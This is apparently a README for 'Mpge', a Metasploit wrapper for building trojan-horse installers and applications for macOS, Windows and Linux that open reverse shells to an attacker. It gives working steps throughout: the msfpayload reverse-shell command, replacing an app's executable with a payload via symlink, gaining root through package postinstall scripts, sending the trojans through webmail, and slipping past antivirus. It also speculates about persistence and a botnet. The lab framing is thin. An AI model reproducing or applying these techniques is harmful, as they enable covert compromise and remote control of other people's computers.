Mpge is a wrapper of meterpreter (msfconsole, msfpayload and msfencode) of Metasploit Framework directly integrated with Mac OS X Snow Leopard 10.6.8 and with OS X Mavericks 10.9. With Mpge is possible make trojan horse files for Microsoft Windows, Linux, Mac OS X 10.3 Panther, Mac OS X 10.4 Tiger, Mac OS X 10.5 Leopard and Mac OS X Montain Lion 10.8.1. For Mac OS X is possible make a trojan horse files contains a reverse shell into files .pkg and files .app. I used three real Mac OS X. Attacker: My MacBook with Snow Leopard 10.6.8 Targets: My Mac iBook PowerPC G4 with Mac OS X10.3.5 Panther and after my MacBook and my iMac Mac OS X Mountain Lion 10.8.1. All Mac OS X were connected on intranet lan of an italian ISP. MacBook is in listening and expected the reverse shell from the target i my Mac iBook PowerPC G4 receive a package and when click on file .pkg and insert the user password and the attacker receive a reverse shell. For more details read Features and User Reviews.
- All tests were conducted in order to study and laboratory to perform test on ids, firewalls and anti-malware on Microsoft Windows, Linux and Mac OS X on an intranet, which in my case it is an italian ISP (Internet Service Provider) (The Internal IP Addresses with the same network class of IP addressing used in all tests they relate of internal IP Addresses released from DHCP server of ISP). It is a normal adsl. I use Mpge on my adsl without Firewalls and IDS. This is an intranet and is important that the attacker host and targets should be in the same network. I have conducted all tests only for Mac OS X and always with two Mac OS X. An attacker my MacBook and one target my Mac iBook PowerPC G4 or my iMac. All Mac OS X are in same ISP (Internet Service Provider) intranet network both connected in this network with RG45 cables, after through the same intranet wifi connection without powerline connected with RG45 on my router. The program enjoys the GNU General Public License version 3.0 (GPLv3). For Metasploit Framework the licence is url: metasploit.com/license.jsp. Disclaimer: This software is provided by the author ``as is'' and any expressed or implied warranties, including, but not limited to, the implied warranties of merchantability and fitness for a particular purpose are disclaimed. In no event shall the author be liable for any direct, indirect, incidental, special, exemplary, or consequential damages (Including, but not limited to, procurement of substitute goods or services; loss of use, hardware, data, profits, life, or limb; or business interruption) homever caused and on any theory of liability, whether in contract, strict liability, or tort (Including negligence or otherwise) arising in any way out of the use of this software, even if advised of the possibility of such damage. Don't hurt your laptop.You don't have to swing it so hard, you know. If you do break damage to your machine in any way, it is your fault. The connection between the MacBook and Mac iBook PowerPC G4 (or the other target iMac) that realizes the root shell of the target Mac iBook POWERPC G4 on the attacker MacBook and through the package file .pkg downloaded from a public web mail portal and installed on Mac iBook (or a file .pkg realized with Iceberg or a file .dmg containing a file . app for iMac) realize an overlap between two shells, one of the listener MacBook and two of the target Mac iBook (or the other target iMac). Through this overlap, (realize with support of an adapter powerline 200 Mbps you can view and create data from MacBook to Mac iBook (or iMac). For example create a folder from MacBook on Mac iBook POWERPC G4 (or iMac) that they are in the same intranet network. The problem is that such a connection is established through an intranet (wifi or lan) electrified by the use within their own of a powerline adapter connected with RG45 cable on my router in the same intranet network.
- All tests are conducted with cables RG45 and after with wifi connection between my MacBook Snow Leopard 10.6.8 and my Mac iBook POWERPC G4 (Mac OS X 10.3.5 Panther) and between my MacBook and my iMac (Mac OS X Montain Lion 10.8.1). For more details see images in a directory Files: Test Environment Mac iBook POWERPC G4 Mac OS X 10.3 Panther, MacBook Mac OS X Snow Leopard 10.6.3 and iMac Mac OS X Mountain Lion 10.8.1.
- The connection between two Mac OS X my MacBook attacker and targets my Mac iBook POWERPC G4 or my iMac Mac OS X Mountain Lion 10.8.1 that are located in the same network. At this point you need to prepare on my MacBook attacker a new reverse shell and create a new package with PackageMaker or Iceberg and send it to the target, start a listener on attacker, download a trojan horse file on a target click on it and the connection opens. In all tests the password to install the trojan horse file on my Mac OS X PowerPC G4 or my iMac is entered by user target of the attack. In my lab the password on target is always inserted by me.
- During my tests when the connection opened i immediately captured in the screenshots that are in different folders in a directory Files.
- To conduct this laboratory in addition to the normal use meterpreter msfconsole, msfpayload and msfencode you can try with an addiction of a powerline adapter. The actual payloads for Mac OS X are: osx/ppc/shell_reverse_tcp and osx/x86/shell_reverse_tcp which realize http reverse shells connections. The reverse shell is insert into files .pkg and files .app.
- Release of Mpge for OS X Snow Leopard 10.6.8 in directory Files: Mpge OS X Snow Leopard 10.6.8: Mpge v.1.3.tgz.
- New release of Mpge for OS X Mavericks 10.9 in directory Files: Mpge v.1.0 OS X Mavericks: Mpge v.1.0 OS X Mavericks.tgz.
- The last version of Mpge for OS X Mavericks 10.9 can take back all tests carried in the laboratory with the Mac Book with OS X Snow Leopard 10.6.8 as the attacker and the iBook as the target. In this new release will be the OS X Mavericks 10.9 is the attacker and Mac Book is the target. The simple osx/x86/shell_reverse_tcp can be inserted within any applications. Is an executable hidden of example in a path /Applications/Safari.app/Contents/MacOS/Safari. Clicking on Safari and instead run Safari run a reverse shell. To do so as it run after safari and before a reverse shell you can create a third executable in bash scripting that run in sequence before Safari and after run the reverse shell. The web mail portal is only a foothold of files .app contains a reverse shell and is located in a different network. The file is sent from the attacker OS X Mavericks 10.9 on the web mail portal with e-mail address of the attacker and downloaded on the same web mail portal from the target Mac Book with different e-mail address, the e-mail address of target. The OS X Mavericks 10.9 and MacBook they are in the same network. For more details see directory Files: Mpge v.1.0 OS X Mavericks 10.9.
The script mpge.sh is a wrapper for now consists of fourth main areas: The first area is dedicated to the creation of trojans horse files for Microsoft Windows, Mac OS X and Linux. A second area for listeners instructed to intercept the connection is opened by our trojans horse files. A third area is dedicated to networking in particular monitoring and collecting information on the IP on which we are carrying out our investigation. A fourth area is dedicated to creation of trojan horse files for Mac OS X with extension .pkg, .app and .dmg (that contains files .app) and to creation of trojan horse files for Microsoft Windows. To create the trojan horse file you can use a script and insert IP address and port before you need to go inside a script and insert the original file that you want use and after a name of trojan horse file. After i used to Backbox means VMware Fusion for Mac (on my MacBook with Mac OS X Snow Leopard 10.6.8) and i use it for the reverse shell and reverse shell with script evil.sh between attacker my MacBook with Mac OS X Snow Leopard 10.6.8 and target my Mac iBook POWERPC G4 with Mac OS X 10.3.5 Panther. After between attacker my MacBook with Mac OS X Snow Leopard 10.6.8 and target my iMac with Mac OS X Mountain Lion 10.8.1. Before i decided to use Mpge directly integrated with Metasploit Framework. Important: To use mpge need to run it as root. My wrapper of meterpreter is only for Mac OS X Snow Leopard 10.6.8. Test Environment is: Attacker my MacBook Mac OS X Snow Leopard 10.6.8 Targets : My Mac iBook POWERPC G4 Mac OS X 10.3.5 Panther, and after Attacker: My MacBook Mac OS X Snow Leopard 10.6.8 and my iMac Mac OS X Mountain Lion 10.8.1. Warning: It's a little bit bit complicated create package for Mac OS X but with practice you can realize them in a short time and it is said that the connection works. The connection between two Mac OS X my MacBook attacker and targets my Mac iBook POWERPC G4 or my iMac Mac OS X Mountain Lion 10.8.1 that are located in the same network sometimes it worked and sometimes not. At this point you need to prepare on my MacBook attacker a new reverse shell and create a new package with PackageMaker or Iceberg and send it to the target, start a listener on a attacker, download a file on a target click on it and see if the connection opens. Don't worry if it does not work try again with calm is just for fun is for relaxing. I was able to captured the moment in which the connection means a reverse shell between these two Mac OS X my MacBook Mac OS X Snow Leopard 10.6.8 Attacker and my target Mac iBook POWERPC G4 Mac OS X 10.3.5 Panther and the other target my iMac Mac OS X Mountain Lion 10.8.1 is open. For more details enters into the folder Files that contains folders named Reverse Shell, The Pyramid, my MacBook and my iMac, my MacBook and my Mac iBook POWERPC G4, Creation trojan horse file .app and .dmg and see images. While, for example in the last test the creation of the file .pkg create package with Iceberg the connection means a reverse shell is not open. Instead, in this type of test package previously made the connections are always open. For example see images in a folder Reverse Shell. If the test don't succefull is necessary to stop thinking about what went wrong and when you want to try again. Structure of the wrapper: Start ./mpge.sh Insert IP: Insert IP Address. Insert Port: Choose the port that will listen. Insert Original filename: Choose the original file to be transformed. (Microsoft Windows) Before a creation of trojan horse execute script ./move.sh in a directory Original-files this script copy original file in directories /opt/local/msf/data/templates and /opt/local/msf/lib/msf/util. Insert Trojan filename: Choose the name of trojan file. (Microsoft Windows) Mpge is an Arc: In the part below Mpge becomes an arc just work on functions, paths and assign them the appropriate variables. I'm work about Microsoft Windows, Mac OS X and Linux but is possible create trojan files for all for others operating systems as HP UX, Sun Solaris etc... Is very fun! First Area: Payloads and Encoding: Option 1: Create Trojan Horse file for Microsoft Windows contains a reverse shell Option 2: Create Trojan Horse file for Microsoft Windows contains vncinject reverse shell For Mac OS X and Linux insert only IP address and port and after select options 3,4 or 5 and the reverse shell is ready. Option 3: Create Trojan Horse file for Mac OS X x86 contains reverse shell. Option 4: Create Trojan Horse file for Mac OS X ppc contains reverse shell. Option 5: Create Trojan Horse file for Linux contains reverse shell. To create these trojan files for Mac OS X and Linux insert only IP address and port and after use options 3, 4, 5. Is not necessary entering Original Trojan filename and Trojan filename because the name of file are in mpge.sh. Second Area: Starting Payloads: Option 6: Starts the msfconsole listening reverse shell for Microsoft Windows Option 7: Starts the msfconsole listening vncinject reverse shell for Microsoft Windows Option 8: Starts the msfconsole listening reverse shell for Mac OS X x86 Option 9: Starts the msfconsole listening reverse shell for Mac OS X ppc Option 10: Starts the msfconsole listening reverse shell for Linux In a directory listeners are files for example named osxrev.rc set it the IP address of attacker. For more details see folder Options in directory Files. Third Area: Option 11: IP interface Option 12: Status of IP (Locate IP active) Option 13: Send mail (You send an mail with Mail.app) Option 14: Results of IP (Collection of informations about IP sent by e-mail) Option 15: VisualRoute (Tracking Network IP) Fourth Area: Option 16: PackageMaker (Start PackageMaker to create packages for Mac OS X) Option 17: Iceberg (Create packages with Iceberg for iMac Mac OS X Montain Lion 10.8.1) Option 18: Creation of files .dmg Note: For make a reverse shell as user root: Make a reverse shell mac1 as user root and after ever user root make a give it root permissions. Whith PackageMaker create a package .pkg and insert it in a group root and after insert it in option post installation.When the target receive a file .pkg click on it insert a password ad user logged and run a reverse shell with permission as root. The attacker receive a reverse shell as user root. For more details see images in a directory Options in a folder Files. Package Creation for Mac OS X: To create the packages you can use the PackageMaker or Iceberg i prefer PackageMaker after i use Iceberg for creates packages for iMac with Mac OS X Mountain Lion 10.8.1. For more details about Options 16 Iceberg see images in a directory Create package with Iceberg. PackageMaker, Iceberg, Firefox and Mail.app are already in a file Mpge v.1.3.tgz while copy Safari.app (Applications) and Disk Utility.app (Applications/Utilities) in a directory msf3. Once extracted on Mac OS X you should enter in the directory /Developer/Applications. With option 15 start PackageMaker is possible to creates packages for Mac OS X v10.4 Tiger, Mac OS X v.10.3 Panther and Mac OS X v.10.5 Leopard. (Fig.5 in first page). For instructions read: Package for Mac OS X.doc To use option 16 Iceberg select folder Files and after folder Create package with Iceberg and see images. With option 16 is possible to create files .dmg and put in files .app contains a reverse shell. With option 17 is possible to create files .pkg for Mountain Lion 10.8.1. Package Creation for Microsoft Windows: After is possible to creates packages for Microsoft Windows use options 1 and 2. For this experiment i used VMware Fusion on my Mac OS X Snow Leopard 10.6.8. with virtual machine Microsoft Vista. About Microsoft Windows is important to test the reverse shell inside different size of file. In this experiment i use file AdbeRdr1014_en_US.exe and AVG 2013 not identifies the reverse shell. For Microsoft Windows firewall is active with permission to pass off the SSL port 443. Downloading AVG 2013 it is also equipped with a firewall. In this case we have emulated a user click on Allow to open the connection. This is only an example. It 'clear that you have to try different Antivirus and hence experimenting with different sizes and types of files. For more details see images in a folder Microsoft Windows in a folder Files. Package Creation for Linux: Regarding Linux tested with a virtual machine, you can integrate Mpge with Rust (rust.sourceforge.net/download.html) Rust allows us to create files .rpm containing the scripts .sh. For this integration, I leave to you the fun! For more information see images in a folder Linux in a folder Files Modules: You can use modules in Autoscript or manual mode. Interesting is for example the module winenum.rb that performs a full enumeration host target. In the directory created by this module i put a script compress.sh that compresses the data into a tar.gz file. For execute module when reverse shell is open command is run ./winenum.rb. You can then send the results to a server and data collection. see folder Microsoft Windows. You can try with different modules. Test on a ISP network Attacker: My MacBook Target: My Mac iBook POWERPC G4 Note: For all tests with the three Mac OS X: My MacBook Snow Leopard 10.6.8, my Mac iBook POWERPC G4 with Mac OS X 10.3.5 Panther and my iMac with os Mac OS X Mountain Lion 10.8.1 before i used lan connection with cables RG-45 connected to a gateway of an italian ISP and after always for all test i used my wifi connection. ISP Network: Attacker: My MacBook Target: My Mac iBook POWERPC G4 Installing file .pkg on my Mac iBook POWERPC G4 (Target), while my MacBook is an attacker. In this experiment, as in all other experiments I've never used USB flash drives but I made the exchange of files over a shared folder. The reverse shell with evil script between my MacBook and my Mac iBook PowerPC G4 is very strange test. I do not know how I came up with this test was curiosity!!! (image 7). The connection if you use files .pkg with reverse shell at the end of installation of file .pkg continued if the user not see active processes. You can see on my MacBook with the command uname -a the user on my Mac iBook POWERPC G4. It 's very difficult to use this type of package. Only works once. Is difficult because is how to insert a file that works only locally (evil.sh) inside a remote connection (the reverse shell). If something is wrong must rebuild all create a new reverse shell assign right permissions and create a new package from scratch a few times also redoing the reverse shell. I managed to make it work between the two Mac OS X my MacBook and my iBook PowerPC G4 4-5 times then i got tired but when it succeeds is very funny! It's similar to carpe diem and i immediately making a screenshot for example "The reverse shell with evil script between my MacBook and my Mac iBook PowerPC G4. Was an experiment and i try it in a intranet (The internal IP address released from DHCP server of an italian ISP) without firewalls and without ids. I've never tried in this workshop, trojan files for Microsoft Windows. As regards the Mac OS X if you try to make a direct connection from your network to a different network this i don't know if it works and I've never tried. Second definitely for the Mac OS X still there being included only the payload that creates connections that are not encrypted connection certainly is intercepted by IDS and blocked by firewalls. See images in folder: MacBook and Mac iBook POWERPC G4. Reverse Shell: Attacker: My MacBook Target: My Mac iBook POWERPC G4 In this experiment is a classic reverse shell between my MacBook Mac OS X Snow Leopard 10.6.8 and my Mac iBook POWERPC G4 with Mac OS X10.3.5 Panther. See image 4 Start reverse shell.png. See images in folder: Reverse Shell The Pyramid: Internet and return to internal lan (The internal IP address released from DHCP server of an italian ISP): Attacker: My MacBook Point of support: (Webmail provider) Target: My Mac iBook POWERPC G4 Note: After the download of trojan horse file on a target my Mac iBook POWERPC G4 the connection is between the attacker: My MacBook and target: my Mac iBook POWERPC G4 It's similar to create a pyramid! An attacker create a packages (created with the version I have tested during the experiments in which there is no usb flash drive) which contains the reverse shell created as user root and sending the file .pkg to an webmail provider (is only a point of support for our trojan file). In this an experiment.The attacker my MacBook is in listening log on a simply web mail portal for example (mail.tiscali.it: IP Address 126.96.36.199) with userid and password and send a file Test.zip compress with StuffIt Expander which contains an executable (mac1) that contains and run an osx/ppc/shell_reverse_tcp. The target my Mac iBook POWERPC G4 (always me) login on the same web mail portal with the same userid and password and download a file Test.zip. Of course, the attacker can send directly without access to any web mail portal different trojans files to different email addresses just know that before the file is not intercepted. In my case being a workshop, i wanted to make a double connection attacker and target at the same web mail portal with the same login credentials. After download on my Mac iBook POWERPC G4 or iMac the user extract the file Test.zip and click on the file Test.pkg and after to start the installation the user on target insert a root password and execute an installation. The attacker and the target are located in the same network it is an italian ISP. The attacker MacBook receives the reverse shell as the root of the target Mac iBook POWERPC G4. See images in the folders "Sending file .pkg created on my MacBook by e-mail to the target my Mac iBook POWERPC G4 (Internet) and folder "Reverse Shell (Intranet). In this test i sending file .pkg created on my MacBook by e-mail at target my Mac iBook POWERPC G4 compress and sending by mail in a file named Test.zip that contains a file Test.pkg that contains a reverse shell for Mac OS X ppc.The user on the target download file Test.zip and click on Test.pkg insert a password as root and when the installation of file .pkg is completed and you push close installation the reverse shell on my MacBook as root the process related to the reverse shell until it is closed the process. This is a package .pkg that contains a reverse shell and in post installation run a script named evil.sh. I create this package without following the official instructions but performing various tests. The result is that the evil.sh does nothing but return the same attacker the reverse shell that inherits the permissions of the user who runs it. In this case the user on my Mac iBook G4 is a normal user in other tests on Internet i create the reverse shell with permission as user root. The user root on my Mac iBook POWERPC G4 (always me) click on file .pkg insert a password of root and returns on my MacBook (the attacker) a reverse shell as user root. Imagine multiple users of the same ISP network receive access to different portals and download this Trojan horse file. If we include the persistence we have a small of botnet on ISP network (which I never tried). Would be essential to integrate the public web mail portals of the antivirus type enterprise directly integrated with web mail portals. See image 12 Reverse shell as root on MacBook of Mac iBook POWERPC G4.png in the folder Files: The Pyramid. One objective of this research is to hide the process. For more details about this test on internet and return to my lan see images in the folder: The Pyramid Test reverse shell contains in a file .app: Attacker: My MacBook Mac OS X Snow Leopard 10.6.8 Target: My iMac Mac OS X Mountain Lion 10.8.1 Other test were performed between my MacBook Snow Leopard 10.6.8 and my iMac with Mac OS X Mountain Lion 10.8.1. We have moved to create an application .app containing that contains the executable mac2 that contains and run a osx/x86/shell_reverse_tcp shell see images in the folder MacBook and iMac. Testing was conducted means lan and wifi. Is open a reverse shell between my MacBook and my iMac with Mac OS X Mountain Lion. To create file .app beginning i use Automator. After i realized it was much easier to insert the reverse shell into the file. app and create a symbolic link between the application executable and reverse shell all contained inside the app file itself. To create a symbolic link to a Mac OS X application just go to the directory of the application: mv mac1 /Users/Marco/Desktop/Font Book.app cd Contents mv mac1 /Users/Marco/Desktop/Font Book.app/Contents cd MacOS mv mac1 /Users/Marco/Desktop/Font Book.app/Contents/MacOS Here is the real executable of application in Mac OS X. To create the symbolic link simply move the files executables mac1 that contains and run an osx/ppc/shell_reverse_tcp or the executable mac2 that contains and run osx/x86/shell_reverse_tcp in this folder MacOS and type the command ln -sf name reverse shell name application: ln -sf mac1 Font Book.app Other mode more easy is: 1) Copy Original Application in msf3 2) Create a reverse shell and copy it in a folder where is a original file for example: cp reverse shell /Users/Marco/Desktop/msf3/Original-Files/Firefox.app/Contents/MacOs/original file (es.firefox). You can change name application in mpge.sh /Users/Marco/Desktop/msf3/msfpayload osx/x86/shell_reverse_tcp LHOST=$ip LPORT=$porta X > name of the executable chmod +x name of the executable See images in a folder Creation trojan horse file .app and .dmg Creation of trojan horse files .app and their container .dmg: Attacker: My MacBook Target: My iMac In this experiment i download the file named BBEdit.app. Is possible to download any application. After on attacker my MacBook Mac OS X Snow Leopard 10.6.8 i accessing the structure of the application and i created a symbolic link to the reverse shell i added insert in a file BBEdit.app. The user on my iMac Mac OS X Mountain Lion 10.8.1 click on file BBEdit.app and open the reverse shell to the attacker MacBook. See image 5 Reverse Shell on MacBook of iMac OS X Mountain Lion 10.8.1 with file BBEdit.png. And after this is a classic reverse shell. This is a same experiment content in a folder MacBook and iMac. See image 6 Reverse shell between MacBook and image iMac(Mac OS X Mountain Lion).png which is the list directories of iMac reverse shell open on attacker MacBook see image 7 Directories of iMac with Mountain Lion.png. For more details see images in the folder MacBook and iMac and images in folder: Creation of trojan horse file .app and .dmg (that contains files .app). Mpge is directly integrated with Metasploit Framework but is necessary with root install ruby1.9.x: port install ruby19 and mysql5: port install mysql5. Download file Mpge v.1.3.tgz or file Mpge v.1.3.dmg extrack, after change the file mpge.sh and insert your path example: /Users/Marco/Desktop/msf3 change with Users/your user/Desktop/msf3 The applications Iceberg.app, IP-Scanner.app and PackageMaker.app used on MacBook with os Mac OS X Snow Leopard 10.6.8 are directly integrated in Mpge v.1.3.tgz. Others applications are in these path: /Applications/Utilities/Disk Utility.app /Applications/Firefox.app /Applications/Mail.app /Applications/Safari.app. Copy these applications in a directory msf3. Mpge OS X Mavericks 10.9: Before download Mpge v.1.0 OS X Mavericks.tgz. After decompress a file and copy a directory msg in a directory /opt. After installing here all elements for installation of Metasploit Framework 4.8 onto OS X Mavericks and after go in a directory /opt/msf and type chmod 777 mpge.sh and Mpge is ready.